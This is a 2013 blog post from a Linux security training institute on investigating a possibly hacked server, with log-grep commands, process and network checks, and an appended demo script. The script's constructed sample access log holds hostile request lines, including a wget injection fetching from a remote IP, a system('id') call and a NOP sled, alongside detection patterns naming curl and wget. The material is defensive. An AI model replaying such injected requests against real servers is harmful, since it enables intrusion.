Filename | Is your Linux Server Hacked, Investigation in Arizona Style.. |
Permission | rw-r--r-- |
Author | Unknown |
Date and Time | 4/26/2013 |
Label | Penetration |
Action |
Ethical Hacking Institute in Pune
./Arizona Team
Hi friends !!
Every day thousands of websites and servers get pwn3d by some H4x0r. So, are you a victim ??
Well, today I am gonna explain how to investigate your pwn3d Linux server step by step !!
If you are a Hacker, then pray to God that you never face Investigators like us.
First of all, find out whether you are really pwn3d or not ..
Find all text files that were modified in the last 60 days:
Command :
$ find /home/username -iname "*.txt" -mtime -60 -print
Running the above command lists every text file modified within the last 60 days; you can change the time window and the file extension. For example, to find all PHP files modified by anyone, whether by you or by a h4x0r, change "*.txt" to "*.php".
Furthermore, follow the steps one by one to find out whether your server is pwn3d or not..
Who is currently active and connected on the Server:
$ w
$ netstat -nalp | grep ":22"
OR
$ w && netstat -nalp | grep ":22"
The above commands show who is currently connected to your server via the SSH port.
The command below shows who was connected to, or is currently on, the server:
$ last
The first command below shows who logged in to your server over SSH (port 22) using the root password, while the second shows who connected to your server over FTP (port 21):
$ cat /var/log/secure* | grep ssh | grep Accept
$ cat /var/log/secure* | grep ftp | grep Accept
Now check the current network activity of your server:
$ netstat -nalp
$ nmap localhost
OR
$ netstat -nalp && nmap localhost
What Active processes are Running:
$ ps -elf
$ ls /proc/*/exe -la
What Files are in the Common Attack Points:
$ ls /tmp -la
$ ls /var/tmp -la
$ ls /dev/shm -la
These are the common unsecured places through which h4x0rz intrude into your Linux server.
Don't delete anything or make changes just yet; just catalog everything. Do not access a file with cat or strings; catalog the files and save that for later. Once you start deleting things you can no longer investigate how deep they have penetrated. Don't be fooled into seeing a common Apache compromise and thinking it ended there. Many times that was just the broken window they used to get in the first time; meanwhile they are tunneling deeper, trying to get root access.
A few common things to check
Find out the Linux version:
$ cat /etc/redhat-release
For non-Red Hat Linux:
$ cat /etc/issue
Now compare this to the kernel version.
To find the kernel version:
$ uname -a
and
$ cat /proc/version
Who is the author of the file:
$ ls -la --author
When was the file last accessed, and by whom:
$ ls -l --time=access
Before you run off and use the cat command, it is good to first check the file type with the file command. Many times even I myself have been fooled by seeing a file named something.html and finding it was really a binary file.
What kind of file is it (ASCII or binary):
$ file filename
OR
$ file /path/to/directory/*
You may have been trying to be sneaky by not having any obvious virus scan running in the process list, so as not to be detected, but that is tedious and slow work.
Update the locate database:
$ updatedb &
If this is a web server, then the next thing to hunt for is signs of Apache exploits and SQL injection scripts. The commands below do a nice job of hunting through the log files, rather than the long, tedious work of searching manually.
Search for Apache exploits
$ for i in `locate access_log`; do echo "$i"; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' "$i"; done
OR
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*
For cPanel
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
Ensim
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*
Plesk
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*
Search for Shell Code:
$ grep -F '\x90' /path/to/access/logs/*
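As an added example that is not part of the original post, the script below runs the post's Apache-exploit signature and its shellcode (\x90 NOP sled) check over a constructed access_log sample and reports the suspicious lines per file, much like the locate loop above. The log lines and addresses are made up for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): apply the post's exploit
# signature and NOP-sled check to a constructed Apache access_log.
# Every log line below is constructed; addresses are documentation ranges.

EXPLOIT_RE='(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'   # the post's egrep pattern
NOP_STR='\x90'                                                # literal NOP-sled marker

# count_exploit_hits FILE: number of lines matching the exploit signature
count_exploit_hits() {
    grep -E -i -c "$EXPLOIT_RE" "$1" || true
}

# count_nop_hits FILE: number of lines containing a literal \x90
count_nop_hits() {
    grep -F -c "$NOP_STR" "$1" || true
}

# hunt_log FILE: print the file name, then each suspicious line with its line number
hunt_log() {
    echo "== $1"
    grep -E -i -n "$EXPLOIT_RE" "$1" || true
    grep -F -n "$NOP_STR" "$1" || true
}

# Constructed sample log: two benign requests, one command-injection attempt
# (wget%20), one PHP code-injection attempt (system(), and one NOP-sled request.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [26/Apr/2013:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.9 - - [26/Apr/2013:10:02:17 +0000] "GET /page.php?id=1;wget%20http://198.51.100.7/x HTTP/1.1" 200 88
203.0.113.9 - - [26/Apr/2013:10:02:40 +0000] "GET /?q=system('id') HTTP/1.1" 500 0
203.0.113.12 - - [26/Apr/2013:10:03:01 +0000] "GET /images/logo.png HTTP/1.1" 200 4096
203.0.113.20 - - [26/Apr/2013:10:04:11 +0000] "GET /cgi-bin/a?\x90\x90\x90\x90 HTTP/1.1" 400 0
EOF

hunt_log "$SAMPLE_LOG"
```

Point hunt_log at real log files (for example the cPanel or Plesk paths listed above) to get the same per-file report; as the post says, only catalog the hits at this stage.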
Don't ever dare to get involved in unethical hacking..
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE